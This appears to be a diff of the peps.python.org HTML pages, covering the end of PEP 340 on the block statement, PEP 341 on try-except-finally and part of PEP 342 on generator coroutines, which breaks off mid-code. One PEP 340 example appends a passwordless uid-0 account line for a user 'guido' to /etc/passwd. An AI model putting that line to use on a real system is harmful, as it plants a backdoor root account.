Here, ‘block’ and ‘as’ are new keywords; EXPR1 is an arbitrary +expression (but not an expression-list) and VAR1 is an arbitrary +assignment target (which may be a comma-separated list).

+

The “as VAR1” part is optional; if omitted, the assignments to +VAR1 in the translation below are omitted (but the expressions +assigned are still evaluated!).

+

The choice of the ‘block’ keyword is contentious; many +alternatives have been proposed, including not to use a keyword at +all (which I actually like). PEP 310 uses ‘with’ for similar +semantics, but I would like to reserve that for a with-statement +similar to the one found in Pascal and VB. (Though I just found +that the C# designers don’t like ‘with’ [2], and I have to agree +with their reasoning.) To sidestep this issue momentarily I’m +using ‘block’ until we can agree on the right keyword, if any.

+

Note that the ‘as’ keyword is not contentious (it will finally be +elevated to proper keyword status).

+

Note that it is up to the iterator to decide whether a +block-statement represents a loop with multiple iterations; in the +most common use case BLOCK1 is executed exactly once. To the +parser, however, it is always a loop; break and continue return +transfer to the block’s iterator (see below for details).

+

The translation is subtly different from a for-loop: iter() is +not called, so EXPR1 should already be an iterator (not just an +iterable); and the iterator is guaranteed to be notified when +the block-statement is left, regardless if this is due to a +break, return or exception:

+
itr = EXPR1  # The iterator
+ret = False  # True if a return statement is active
+val = None   # Return value, if ret == True
+exc = None   # sys.exc_info() tuple if an exception is active
+while True:
+    try:
+        if exc:
+            ext = getattr(itr, "__exit__", None)
+            if ext is not None:
+                VAR1 = ext(*exc)   # May re-raise *exc
+            else:
+                raise exc[0], exc[1], exc[2]
+        else:
+            VAR1 = itr.next()  # May raise StopIteration
+    except StopIteration:
+        if ret:
+            return val
+        break
+    try:
+        ret = False
+        val = exc = None
+        BLOCK1
+    except:
+        exc = sys.exc_info()
+
+
+

(However, the variables ‘itr’ etc. are not user-visible and the +built-in names used cannot be overridden by the user.)

+

Inside BLOCK1, the following special translations apply:

+
    +
  • “break” is always legal; it is translated into:
    exc = (StopIteration, None, None)
    +continue
    +
    +
    +
  • +
  • “return EXPR3” is only legal when the block-statement is +contained in a function definition; it is translated into:
    exc = (StopIteration, None, None)
    +ret = True
    +val = EXPR3
    +continue
    +
    +
    +
  • +
+

The net effect is that break and return behave much the same as +if the block-statement were a for-loop, except that the iterator +gets a chance at resource cleanup before the block-statement is +left, through the optional __exit__() method. The iterator also +gets a chance if the block-statement is left through raising an +exception. If the iterator doesn’t have an __exit__() method, +there is no difference with a for-loop (except that a for-loop +calls iter() on EXPR1).

+

Note that a yield-statement in a block-statement is not treated +differently. It suspends the function containing the block +without notifying the block’s iterator. The block’s iterator is +entirely unaware of this yield, since the local control flow +doesn’t actually leave the block. In other words, it is not +like a break or return statement. When the loop that was resumed +by the yield calls next(), the block is resumed right after the +yield. (See example 7 below.) The generator finalization +semantics described below guarantee (within the limitations of all +finalization semantics) that the block will be resumed eventually.

+

Unlike the for-loop, the block-statement does not have an +else-clause. I think it would be confusing, and emphasize the +“loopiness” of the block-statement, while I want to emphasize its +difference from a for-loop. In addition, there are several +possible semantics for an else-clause, and only a very weak use +case.

+
+
+

Specification: Generator Exit Handling

+

Generators will implement the new __exit__() method API.

+

Generators will be allowed to have a yield statement inside a +try-finally statement.

+

The expression argument to the yield-statement will become +optional (defaulting to None).

+

When __exit__() is called, the generator is resumed but at the +point of the yield-statement the exception represented by the +__exit__ argument(s) is raised. The generator may re-raise this +exception, raise another exception, or yield another value, +except that if the exception passed in to __exit__() was +StopIteration, it ought to raise StopIteration (otherwise the +effect would be that a break is turned into continue, which is +unexpected at least). When the initial call resuming the +generator is an __exit__() call instead of a next() call, the +generator’s execution is aborted and the exception is re-raised +without passing control to the generator’s body.

+

When a generator that has not yet terminated is garbage-collected +(either through reference counting or by the cyclical garbage +collector), its __exit__() method is called once with +StopIteration as its first argument. Together with the +requirement that a generator ought to raise StopIteration when +__exit__() is called with StopIteration, this guarantees the +eventual activation of any finally-clauses that were active when +the generator was last suspended. Of course, under certain +circumstances the generator may never be garbage-collected. This +is no different than the guarantees that are made about finalizers +(__del__() methods) of other objects.

+
+
+

Alternatives Considered and Rejected

+
    +
  • Many alternatives have been proposed for ‘block’. I haven’t +seen a proposal for another keyword that I like better than +‘block’ yet. Alas, ‘block’ is also not a good choice; it is a +rather popular name for variables, arguments and methods. +Perhaps ‘with’ is the best choice after all?
  • +
  • Instead of trying to pick the ideal keyword, the block-statement +could simply have the form:
    EXPR1 as VAR1:
    +    BLOCK1
    +
    +
    +

    This is at first attractive because, together with a good choice +of function names (like those in the Examples section below) +used in EXPR1, it reads well, and feels like a “user-defined +statement”. And yet, it makes me (and many others) +uncomfortable; without a keyword the syntax is very “bland”, +difficult to look up in a manual (remember that ‘as’ is +optional), and it makes the meaning of break and continue in the +block-statement even more confusing.

    +
  • +
  • Phillip Eby has proposed to have the block-statement use +an entirely different API than the for-loop, to differentiate +between the two. A generator would have to be wrapped in a +decorator to make it support the block API. IMO this adds more +complexity with very little benefit; and we can’t really deny +that the block-statement is conceptually a loop – it supports +break and continue, after all.
  • +
  • This keeps getting proposed: “block VAR1 = EXPR1” instead of +“block EXPR1 as VAR1”. That would be very misleading, since +VAR1 does not get assigned the value of EXPR1; EXPR1 results +in a generator which is assigned to an internal variable, and +VAR1 is the value returned by successive calls to the __next__() +method of that iterator.
  • +
  • Why not change the translation to apply iter(EXPR1)? All the +examples would continue to work. But this makes the +block-statement more like a for-loop, while the emphasis ought +to be on the difference between the two. Not calling iter() +catches a bunch of misunderstandings, like using a sequence as +EXPR1.
  • +
+
+
+

Comparison to Thunks

+

Alternative semantics proposed for the block-statement turn the +block into a thunk (an anonymous function that blends into the +containing scope).

+

The main advantage of thunks that I can see is that you can save +the thunk for later, like a callback for a button widget (the +thunk then becomes a closure). You can’t use a yield-based block +for that (except in Ruby, which uses yield syntax with a +thunk-based implementation). But I have to say that I almost see +this as an advantage: I think I’d be slightly uncomfortable seeing +a block and not knowing whether it will be executed in the normal +control flow or later. Defining an explicit nested function for +that purpose doesn’t have this problem for me, because I already +know that the ‘def’ keyword means its body is executed later.

+

The other problem with thunks is that once we think of them as the +anonymous functions they are, we’re pretty much forced to say that +a return statement in a thunk returns from the thunk rather than +from the containing function. Doing it any other way would cause +major weirdness when the thunk were to survive its containing +function as a closure (perhaps continuations would help, but I’m +not about to go there :-).

+

But then an IMO important use case for the resource cleanup +template pattern is lost. I routinely write code like this:

+
def findSomething(self, key, default=None):
+    self.lock.acquire()
+    try:
+         for item in self.elements:
+             if item.matches(key):
+                 return item
+         return default
+    finally:
+       self.lock.release()
+
+
+

and I’d be bummed if I couldn’t write this as:

+
def findSomething(self, key, default=None):
+    block locking(self.lock):
+         for item in self.elements:
+             if item.matches(key):
+                 return item
+         return default
+
+
+

This particular example can be rewritten using a break:

+
def findSomething(self, key, default=None):
+    block locking(self.lock):
+         for item in self.elements:
+             if item.matches(key):
+                 break
+         else:
+             item = default
+     return item
+
+
+

but it looks forced and the transformation isn’t always that easy; +you’d be forced to rewrite your code in a single-return style +which feels too restrictive.

+

Also note the semantic conundrum of a yield in a thunk – the only +reasonable interpretation is that this turns the thunk into a +generator!

+

Greg Ewing believes that thunks “would be a lot simpler, doing +just what is required without any jiggery pokery with exceptions +and break/continue/return statements. It would be easy to explain +what it does and why it’s useful.”

+

But in order to obtain the required local variable sharing between +the thunk and the containing function, every local variable used +or set in the thunk would have to become a ‘cell’ (our mechanism +for sharing variables between nested scopes). Cells slow down +access compared to regular local variables: access involves an +extra C function call (PyCell_Get() or PyCell_Set()).

+

Perhaps not entirely coincidentally, the last example above +(findSomething() rewritten to avoid a return inside the block) +shows that, unlike for regular nested functions, we’ll want +variables assigned to by the thunk also to be shared with the +containing function, even if they are not assigned to outside the +thunk.

+

Greg Ewing again: “generators have turned out to be more powerful, +because you can have more than one of them on the go at once. Is +there a use for that capability here?”

+

I believe there are definitely uses for this; several people have +already shown how to do asynchronous light-weight threads using +generators (e.g. David Mertz quoted in PEP 288, and Fredrik +Lundh [3]).

+

And finally, Greg says: “a thunk implementation has the potential +to easily handle multiple block arguments, if a suitable syntax +could ever be devised. It’s hard to see how that could be done in +a general way with the generator implementation.”

+

However, the use cases for multiple blocks seem elusive.

+

(Proposals have since been made to change the implementation of +thunks to remove most of these objections, but the resulting +semantics are fairly complex to explain and to implement, so IMO +that defeats the purpose of using thunks in the first place.)

+
+
+

Examples

+

(Several of these examples contain “yield None”. If PEP 342 is +accepted, these can be changed to just “yield” of course.)

+
    +
  1. A template for ensuring that a lock, acquired at the start of a +block, is released when the block is left:
    def locking(lock):
    +    lock.acquire()
    +    try:
    +        yield None
    +    finally:
    +        lock.release()
    +
    +
    +

    Used as follows:

    +
    block locking(myLock):
    +    # Code here executes with myLock held.  The lock is
    +    # guaranteed to be released when the block is left (even
    +    # if via return or by an uncaught exception).
    +
    +
    +
  2. +
  3. A template for opening a file that ensures the file is closed +when the block is left:
    def opening(filename, mode="r"):
    +    f = open(filename, mode)
    +    try:
    +        yield f
    +    finally:
    +        f.close()
    +
    +
    +

    Used as follows:

    +
    block opening("/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +
  4. +
  5. A template for committing or rolling back a database +transaction:
    def transactional(db):
    +    try:
    +        yield None
    +    except:
    +        db.rollback()
    +        raise
    +    else:
    +        db.commit()
    +
    +
    +
  6. +
  7. A template that tries something up to n times:
    def auto_retry(n=3, exc=Exception):
    +    for i in range(n):
    +        try:
    +            yield None
    +            return
    +        except exc, err:
    +            # perhaps log exception here
    +            continue
    +    raise # re-raise the exception we caught earlier
    +
    +
    +

    Used as follows:

    +
    block auto_retry(3, IOError):
    +    f = urllib.urlopen("https://www.example.com/")
    +    print f.read()
    +
    +
    +
  8. +
  9. It is possible to nest blocks and combine templates:
    def locking_opening(lock, filename, mode="r"):
    +    block locking(lock):
    +        block opening(filename) as f:
    +            yield f
    +
    +
    +

    Used as follows:

    +
    block locking_opening(myLock, "/etc/passwd") as f:
    +    for line in f:
    +        print line.rstrip()
    +
    +
    +

    (If this example confuses you, consider that it is equivalent +to using a for-loop with a yield in its body in a regular +generator which is invoking another iterator or generator +recursively; see for example the source code for os.walk().)

    +
  10. +
  11. It is possible to write a regular iterator with the +semantics of example 1:
    class locking:
    +   def __init__(self, lock):
    +       self.lock = lock
    +       self.state = 0
    +   def __next__(self, arg=None):
    +       # ignores arg
    +       if self.state:
    +           assert self.state == 1
    +           self.lock.release()
    +           self.state += 1
    +           raise StopIteration
    +       else:
    +           self.lock.acquire()
    +           self.state += 1
    +           return None
    +   def __exit__(self, type, value=None, traceback=None):
    +       assert self.state in (0, 1, 2)
    +       if self.state == 1:
    +           self.lock.release()
    +       raise type, value, traceback
    +
    +
    +

    (This example is easily modified to implement the other +examples; it shows how much simpler generators are for the same +purpose.)

    +
  12. +
  13. Redirect stdout temporarily:
    def redirecting_stdout(new_stdout):
    +    save_stdout = sys.stdout
    +    try:
    +        sys.stdout = new_stdout
    +        yield None
    +    finally:
    +        sys.stdout = save_stdout
    +
    +
    +

    Used as follows:

    +
    block opening(filename, "w") as f:
    +    block redirecting_stdout(f):
    +        print "Hello world"
    +
    +
    +
  14. +
  15. A variant on opening() that also returns an error condition:
    def opening_w_error(filename, mode="r"):
    +    try:
    +        f = open(filename, mode)
    +    except IOError, err:
    +        yield None, err
    +    else:
    +        try:
    +            yield f, None
    +        finally:
    +            f.close()
    +
    +
    +

    Used as follows:

    +
    block opening_w_error("/etc/passwd", "a") as f, err:
    +    if err:
    +        print "IOError:", err
    +    else:
    +        f.write("guido::0:0::/:/bin/sh\n")
    +
    +
    +
  16. +
+
+
+

Acknowledgements

+

In no useful order: Alex Martelli, Barry Warsaw, Bob Ippolito, +Brett Cannon, Brian Sabbey, Chris Ryland, Doug Landauer, Duncan +Booth, Fredrik Lundh, Greg Ewing, Holger Krekel, Jason Diamond, +Jim Jewett, Josiah Carlson, Ka-Ping Yee, Michael Chermside, +Michael Hudson, Neil Schemenauer, Alyssa Coghlan, Paul Moore, +Phillip Eby, Raymond Hettinger, Georg Brandl, Samuele +Pedroni, Shannon Behrens, Skip Montanaro, Steven Bethard, Terry +Reedy, Tim Delaney, Aahz, and others. Thanks all for the valuable +contributions!

+
+
+

References

+

[1] https://mail.python.org/pipermail/python-dev/2005-April/052821.html

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0340.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0341/index.html b/pep-0341/index.html new file mode 100644 index 00000000000..77fe7eb34d1 --- /dev/null +++ b/pep-0341/index.html @@ -0,0 +1,242 @@ + + + + + + + + PEP 341 – Unifying try-except and try-finally | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 341 – Unifying try-except and try-finally

+
+
Author:
+
Georg Brandl <georg at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
04-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a change in the syntax and semantics of try +statements to allow combined try-except-finally blocks. This +means in short that it would be valid to write:

+
try:
+    <do something>
+except Exception:
+    <handle the error>
+finally:
+    <cleanup>
+
+
+
+
+

Rationale/Proposal

+

There are many use cases for the try-except statement and +for the try-finally statement per se; however, often one needs +to catch exceptions and execute some cleanup code afterwards. +It is slightly annoying and not very intelligible that +one has to write:

+
f = None
+try:
+    try:
+        f = open(filename)
+        text = f.read()
+    except IOError:
+        print 'An error occurred'
+finally:
+    if f:
+        f.close()
+
+
+

So it is proposed that a construction like this:

+
try:
+    <suite 1>
+except Ex1:
+    <suite 2>
+<more except: clauses>
+else:
+    <suite 3>
+finally:
+    <suite 4>
+
+
+

be exactly the same as the legacy:

+
try:
+    try:
+        <suite 1>
+    except Ex1:
+        <suite 2>
+    <more except: clauses>
+    else:
+        <suite 3>
+finally:
+    <suite 4>
+
+
+

This is backwards compatible, and every try statement that is +legal today would continue to work.

+
+
+

Changes to the grammar

+

The grammar for the try statement, which is currently:

+
try_stmt: ('try' ':' suite (except_clause ':' suite)+
+        ['else' ':' suite] | 'try' ':' suite 'finally' ':' suite)
+
+
+

would have to become:

+
try_stmt: 'try' ':' suite
+        (
+            (except_clause ':' suite)+
+            ['else' ':' suite]
+            ['finally' ':' suite]
+        |
+            'finally' ':' suite
+        )
+
+
+
+
+

Implementation

+

As the PEP author currently does not have sufficient knowledge +of the CPython implementation, he is unfortunately not able +to deliver one. Thomas Lee has submitted a patch [2].

+

However, according to Guido, it should be a piece of cake to +implement [1] – at least for a core hacker.

+

This patch was committed 17 December 2005, SVN revision 41740 [3].

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0341.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0342/index.html b/pep-0342/index.html new file mode 100644 index 00000000000..295edb6ac37 --- /dev/null +++ b/pep-0342/index.html @@ -0,0 +1,705 @@ + + + + + + + + PEP 342 – Coroutines via Enhanced Generators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 342 – Coroutines via Enhanced Generators

+
+
Author:
+
Guido van Rossum, Phillip J. Eby
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
10-May-2005
+
Python-Version:
+
2.5
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Introduction

+

This PEP proposes some enhancements to the API and syntax of generators, to +make them usable as simple coroutines. It is basically a combination of ideas +from these two PEPs, which may be considered redundant if this PEP is +accepted:

+
    +
  • PEP 288, Generators Attributes and Exceptions. The current PEP covers its +second half, generator exceptions (in fact the throw() method name was +taken from PEP 288). PEP 342 replaces generator attributes, however, with a +concept from an earlier revision of PEP 288, the yield expression.
  • +
  • PEP 325, Resource-Release Support for Generators. PEP 342 ties up a few +loose ends in the PEP 325 spec, to make it suitable for actual +implementation.
  • +
+
+
+

Motivation

+

Coroutines are a natural way of expressing many algorithms, such as +simulations, games, asynchronous I/O, and other forms of event-driven +programming or co-operative multitasking. Python’s generator functions are +almost coroutines – but not quite – in that they allow pausing execution to +produce a value, but do not provide for values or exceptions to be passed in +when execution resumes. They also do not allow execution to be paused within +the try portion of try/finally blocks, and therefore make it difficult +for an aborted coroutine to clean up after itself.

+

Also, generators cannot yield control while other functions are executing, +unless those functions are themselves expressed as generators, and the outer +generator is written to yield in response to values yielded by the inner +generator. This complicates the implementation of even relatively simple use +cases like asynchronous communications, because calling any functions either +requires the generator to block (i.e. be unable to yield control), or else a +lot of boilerplate looping code must be added around every needed function +call.

+

However, if it were possible to pass values or exceptions into a generator at +the point where it was suspended, a simple co-routine scheduler or trampoline +function would let coroutines call each other without blocking – a +tremendous boon for asynchronous applications. Such applications could then +write co-routines to do non-blocking socket I/O by yielding control to an I/O +scheduler until data has been sent or becomes available. Meanwhile, code that +performs the I/O would simply do something like this:

+
data = (yield nonblocking_read(my_socket, nbytes))
+
+
+

in order to pause execution until the nonblocking_read() coroutine produced +a value.

+

In other words, with a few relatively minor enhancements to the language and to +the implementation of the generator-iterator type, Python will be able to +support performing asynchronous operations without needing to write the entire +application as a series of callbacks, and without requiring the use of +resource-intensive threads for programs that need hundreds or even thousands of +co-operatively multitasking pseudothreads. Thus, these enhancements will give +standard Python many of the benefits of the Stackless Python fork, without +requiring any significant modification to the CPython core or its APIs. In +addition, these enhancements should be readily implementable by any Python +implementation (such as Jython) that already supports generators.

+
+
+

Specification Summary

+

By adding a few simple methods to the generator-iterator type, and with two +minor syntax adjustments, Python developers will be able to use generator +functions to implement co-routines and other forms of co-operative +multitasking. These methods and adjustments are:

+
    +
  1. Redefine yield to be an expression, rather than a statement. The current +yield statement would become a yield expression whose value is thrown away. +A yield expression’s value is None whenever the generator is resumed by +a normal next() call.
  2. +
  3. Add a new send() method for generator-iterators, which resumes the +generator and sends a value that becomes the result of the current +yield-expression. The send() method returns the next value yielded by +the generator, or raises StopIteration if the generator exits without +yielding another value.
  4. +
  5. Add a new throw() method for generator-iterators, which raises an +exception at the point where the generator was paused, and which returns the +next value yielded by the generator, raising StopIteration if the +generator exits without yielding another value. (If the generator does not +catch the passed-in exception, or raises a different exception, then that +exception propagates to the caller.)
  6. +
  7. Add a close() method for generator-iterators, which raises +GeneratorExit at the point where the generator was paused. If the +generator then raises StopIteration (by exiting normally, or due to +already being closed) or GeneratorExit (by not catching the exception), +close() returns to its caller. If the generator yields a value, a +RuntimeError is raised. If the generator raises any other exception, it +is propagated to the caller. close() does nothing if the generator has +already exited due to an exception or normal exit.
  8. +
  9. Add support to ensure that close() is called when a generator iterator +is garbage-collected.
  10. +
  11. Allow yield to be used in try/finally blocks, since garbage +collection or an explicit close() call would now allow the finally +clause to execute.
  12. +
+

A prototype patch implementing all of these changes against the current Python +CVS HEAD is available as SourceForge patch #1223381 +(https://bugs.python.org/issue1223381).

+
+
+

Specification: Sending Values into Generators

+
+

New generator method: send(value)

+

A new method for generator-iterators is proposed, called send(). It +takes exactly one argument, which is the value that should be sent in to +the generator. Calling send(None) is exactly equivalent to calling a +generator’s next() method. Calling send() with any other value is +the same, except that the value produced by the generator’s current +yield expression will be different.

+

Because generator-iterators begin execution at the top of the generator’s +function body, there is no yield expression to receive a value when the +generator has just been created. Therefore, calling send() with a +non-None argument is prohibited when the generator iterator has just +started, and a TypeError is raised if this occurs (presumably due to a +logic error of some kind). Thus, before you can communicate with a +coroutine you must first call next() or send(None) to advance its +execution to the first yield expression.

+

As with the next() method, the send() method returns the next value +yielded by the generator-iterator, or raises StopIteration if the +generator exits normally, or has already exited. If the generator raises an +uncaught exception, it is propagated to send()’s caller.

+
+
+

New syntax: Yield Expressions

+

The yield-statement will be allowed to be used on the right-hand side of an +assignment; in that case it is referred to as yield-expression. The value +of this yield-expression is None unless send() was called with a +non-None argument; see below.

+

A yield-expression must always be parenthesized except when it occurs at the +top-level expression on the right-hand side of an assignment. So

+
x = yield 42
+x = yield
+x = 12 + (yield 42)
+x = 12 + (yield)
+foo(yield 42)
+foo(yield)
+
+
+

are all legal, but

+
x = 12 + yield 42
+x = 12 + yield
+foo(yield 42, 12)
+foo(yield, 12)
+
+
+

are all illegal. (Some of the edge cases are motivated by the current +legality of yield 12, 42.)

+

Note that a yield-statement or yield-expression without an expression is now +legal. This makes sense: when the information flow in the next() call +is reversed, it should be possible to yield without passing an explicit +value (yield is of course equivalent to yield None).

+

When send(value) is called, the yield-expression that it resumes will +return the passed-in value. When next() is called, the resumed +yield-expression will return None. If the yield-expression is a +yield-statement, this returned value is ignored, similar to ignoring the +value returned by a function call used as a statement.

+

In effect, a yield-expression is like an inverted function call; the +argument to yield is in fact returned (yielded) from the currently executing +function, and the return value of yield is the argument passed in via +send().

+

Note: the syntactic extensions to yield make its use very similar to that in +Ruby. This is intentional. Do note that in Python the block passes a value +to the generator using send(EXPR) rather than return EXPR, and the +underlying mechanism whereby control is passed between the generator and the +block is completely different. Blocks in Python are not compiled into +thunks; rather, yield suspends execution of the generator’s frame. Some +edge cases work differently; in Python, you cannot save the block for later +use, and you cannot test whether there is a block or not. (XXX - this stuff +about blocks seems out of place now, perhaps Guido can edit to clarify.)

+
+
+
+

Specification: Exceptions and Cleanup

+

Let a generator object be the iterator produced by calling a generator +function. Below, g always refers to a generator object.

+
+

New syntax: yield allowed inside try-finally

+

The syntax for generator functions is extended to allow a yield-statement +inside a try-finally statement.

+
+
+

New generator method: throw(type, value=None, traceback=None)

+

g.throw(type, value, traceback) causes the specified exception to be +thrown at the point where the generator g is currently suspended (i.e. at +a yield-statement, or at the start of its function body if next() has +not been called yet). If the generator catches the exception and yields +another value, that is the return value of g.throw(). If it doesn’t +catch the exception, the throw() appears to raise the same exception +passed it (it falls through). If the generator raises another exception +(this includes the StopIteration produced when it returns) that +exception is raised by the throw() call. In summary, throw() +behaves like next() or send(), except it raises an exception at the +suspension point. If the generator is already in the closed state, +throw() just raises the exception it was passed without executing any of +the generator’s code.

+

The effect of raising the exception is exactly as if the statement:

+
raise type, value, traceback
+
+
+

was executed at the suspension point. The type argument must not be +None, and the type and value must be compatible. If the value is not an +instance of the type, a new exception instance is created using the value, +following the same rules that the raise statement uses to create an +exception instance. The traceback, if supplied, must be a valid Python +traceback object, or a TypeError occurs.

+

Note: The name of the throw() method was selected for several reasons. +Raise is a keyword and so cannot be used as a method name. Unlike +raise (which immediately raises an exception from the current execution +point), throw() first resumes the generator, and only then raises the +exception. The word throw is suggestive of putting the exception in +another location, and is already associated with exceptions in other +languages.

+

Alternative method names were considered: resolve(), signal(), +genraise(), raiseinto(), and flush(). None of these seem to fit +as well as throw().

+
+
+

New standard exception: GeneratorExit

+

A new standard exception is defined, GeneratorExit, inheriting from +Exception. A generator should handle this by re-raising it (or just not +catching it) or by raising StopIteration.

+
+
+

New generator method: close()

+

g.close() is defined by the following pseudo-code:

+
def close(self):
+    try:
+        self.throw(GeneratorExit)
+    except (GeneratorExit, StopIteration):
+        pass
+    else:
+        raise RuntimeError("generator ignored GeneratorExit")
+    # Other exceptions are not caught
+
+
+
+
+

New generator method: __del__()

+

g.__del__() is a wrapper for g.close(). This will be called when +the generator object is garbage-collected (in CPython, this is when its +reference count goes to zero). If close() raises an exception, a +traceback for the exception is printed to sys.stderr and further +ignored; it is not propagated back to the place that triggered the garbage +collection. This is consistent with the handling of exceptions in +__del__() methods on class instances.

+

If the generator object participates in a cycle, g.__del__() may not be +called. This is the behavior of CPython’s current garbage collector. The +reason for the restriction is that the GC code needs to break a cycle at +an arbitrary point in order to collect it, and from then on no Python code +should be allowed to see the objects that formed the cycle, as they may be +in an invalid state. Objects hanging off a cycle are not subject to this +restriction.

+

Note that it is unlikely to see a generator object participate in a cycle in +practice. However, storing a generator object in a global variable creates +a cycle via the generator frame’s f_globals pointer. Another way to +create a cycle would be to store a reference to the generator object in a +data structure that is passed to the generator as an argument (e.g., if an +object has a method that’s a generator, and keeps a reference to a running +iterator created by that method). Neither of these cases are very likely +given the typical patterns of generator use.

+

Also, in the CPython implementation of this PEP, the frame object used by +the generator should be released whenever its execution is terminated due to +an error or normal exit. This will ensure that generators that cannot be +resumed do not remain part of an uncollectable reference cycle. This allows +other code to potentially use close() in a try/finally or with +block (per PEP 343) to ensure that a given generator is properly finalized.

+
+
+
+

Optional Extensions

+
+

The Extended continue Statement

+

An earlier draft of this PEP proposed a new continue EXPR syntax for use +in for-loops (carried over from PEP 340), that would pass the value of +EXPR into the iterator being looped over. This feature has been withdrawn +for the time being, because the scope of this PEP has been narrowed to focus +only on passing values into generator-iterators, and not other kinds of +iterators. It was also felt by some on the Python-Dev list that adding new +syntax for this particular feature would be premature at best.

+
+
+
+

Open Issues

+

Discussion on python-dev has revealed some open issues. I list them here, with +my preferred resolution and its motivation. The PEP as currently written +reflects this preferred resolution.

+
    +
  1. What exception should be raised by close() when the generator yields +another value as a response to the GeneratorExit exception?

    I originally chose TypeError because it represents gross misbehavior of +the generator function, which should be fixed by changing the code. But the +with_template decorator class in PEP 343 uses RuntimeError for +similar offenses. Arguably they should all use the same exception. I’d +rather not introduce a new exception class just for this purpose, since it’s +not an exception that I want people to catch: I want it to turn into a +traceback which is seen by the programmer who then fixes the code. So now I +believe they should both raise RuntimeError. There are some precedents +for that: it’s raised by the core Python code in situations where endless +recursion is detected, and for uninitialized objects (and for a variety of +miscellaneous conditions).

    +
  2. +
  3. Oren Tirosh has proposed renaming the send() method to feed(), for +compatibility with the consumer interface (see +http://effbot.org/zone/consumer.htm for the specification.)

    However, looking more closely at the consumer interface, it seems that the +desired semantics for feed() are different than for send(), because +send() can’t be meaningfully called on a just-started generator. Also, +the consumer interface as currently defined doesn’t include handling for +StopIteration.

    +

    Therefore, it seems like it would probably be more useful to create a simple +decorator that wraps a generator function to make it conform to the consumer +interface. For example, it could warm up the generator with an initial +next() call, trap StopIteration, and perhaps even provide reset() by +re-invoking the generator function.

    +
  4. +
+
+
+

Examples

+
    +
  1. A simple consumer decorator that makes a generator function automatically +advance to its first yield point when initially called:
    def consumer(func):
    +    def wrapper(*args,**kw):
    +        gen = func(*args, **kw)
    +        gen.next()
    +        return gen
    +    wrapper.__name__ = func.__name__
    +    wrapper.__dict__ = func.__dict__
    +    wrapper.__doc__  = func.__doc__
    +    return wrapper
    +
    +
    +
  2. +
  3. An example of using the consumer decorator to create a reverse generator +that receives images and creates thumbnail pages, sending them on to another +consumer. Functions like this can be chained together to form efficient +processing pipelines of consumers that each can have complex internal +state:
    @consumer
    +def thumbnail_pager(pagesize, thumbsize, destination):
    +    while True:
    +        page = new_image(pagesize)
    +        rows, columns = pagesize / thumbsize
    +        pending = False
    +        try:
    +            for row in xrange(rows):
    +                for column in xrange(columns):
    +                    thumb = create_thumbnail((yield), thumbsize)
    +                    page.write(
    +                        thumb, col*thumbsize.x, row*thumbsize.y )
    +                    pending = True
    +        except GeneratorExit:
    +            # close() was called, so flush any pending output
    +            if pending:
    +                destination.send(page)
    +
    +            # then close the downstream consumer, and exit
    +            destination.close()
    +            return
    +        else:
    +            # we finished a page full of thumbnails, so send it
    +            # downstream and keep on looping
    +            destination.send(page)
    +
    +@consumer
    +def jpeg_writer(dirname):
    +    fileno = 1
    +    while True:
    +        filename = os.path.join(dirname,"page%04d.jpg" % fileno)
    +        write_jpeg((yield), filename)
    +        fileno += 1
    +
    +
    +# Put them together to make a function that makes thumbnail
    +# pages from a list of images and other parameters.
    +#
    +def write_thumbnails(pagesize, thumbsize, images, output_dir):
    +    pipeline = thumbnail_pager(
    +        pagesize, thumbsize, jpeg_writer(output_dir)
    +    )
    +
    +    for image in images:
    +        pipeline.send(image)
    +
    +    pipeline.close()
    +
    +
    +
  4. +
  5. A simple co-routine scheduler or trampoline that lets coroutines call +other coroutines by yielding the coroutine they wish to invoke. Any +non-generator value yielded by a coroutine is returned to the coroutine that +called the one yielding the value. Similarly, if a coroutine raises an +exception, the exception is propagated to its caller. In effect, this +example emulates simple tasklets as are used in Stackless Python, as long as +you use a yield expression to invoke routines that would otherwise block. +This is only a very simple example, and far more sophisticated schedulers +are possible. (For example, the existing GTasklet framework for Python +(http://www.gnome.org/~gjc/gtasklet/gtasklets.html) and the peak.events +framework (http://peak.telecommunity.com/) already implement similar +scheduling capabilities, but must currently use awkward workarounds for the +inability to pass values or exceptions into generators.)
    import collections
    +
    +class Trampoline:
    +    """Manage communications between coroutines"""
    +
    +    running = False
    +
    +    def __init__(self):
    +        self.queue = collections.deque()
    +
    +    def add(self, coroutine):
    +        """Request that a coroutine be executed"""
    +        self.schedule(coroutine)
    +
    +    def run(self):
    +        result = None
    +        self.running = True
    +        try:
    +            while self.running and self.queue:
    +               func = self.queue.popleft()
    +               result = func()
    +            return result
    +        finally:
    +            self.running = False
    +
    +    def stop(self):
    +        self.running = False
    +
    +    def schedule(self, coroutine, stack=(), val=None, *exc):
    +        def resume():
    +            value = val
    +            try:
    +                if exc:
    +                    value = coroutine.throw(value,*exc)
    +                else:
    +                    value = coroutine.send(value)
    +            except:
    +                if stack:
    +                    # send the error back to the "caller"
    +                    self.schedule(
    +                        stack[0], stack[1], *sys.exc_info()
    +                    )
    +                else:
    +                    # Nothing left in this pseudothread to
    +                    # handle it, let it propagate to the
    +                    # run loop
    +                    raise
    +
    +            if isinstance(value, types.GeneratorType):
    +                # Yielded to a specific coroutine, push the
    +                # current one on the stack, and call the new
    +                # one with no args
    +                self.schedule(value, (coroutine,stack))
    +
    +            elif stack:
    +                # Yielded a result, pop the stack and send the
    +                # value to the caller
